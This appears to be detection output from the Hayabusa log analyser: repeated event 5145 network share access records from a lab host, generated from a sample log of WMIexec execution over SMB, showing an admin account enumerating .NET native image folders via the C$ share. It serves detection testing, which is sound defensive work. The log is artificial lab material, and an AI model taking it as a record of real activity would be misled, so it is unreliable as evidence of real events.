+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
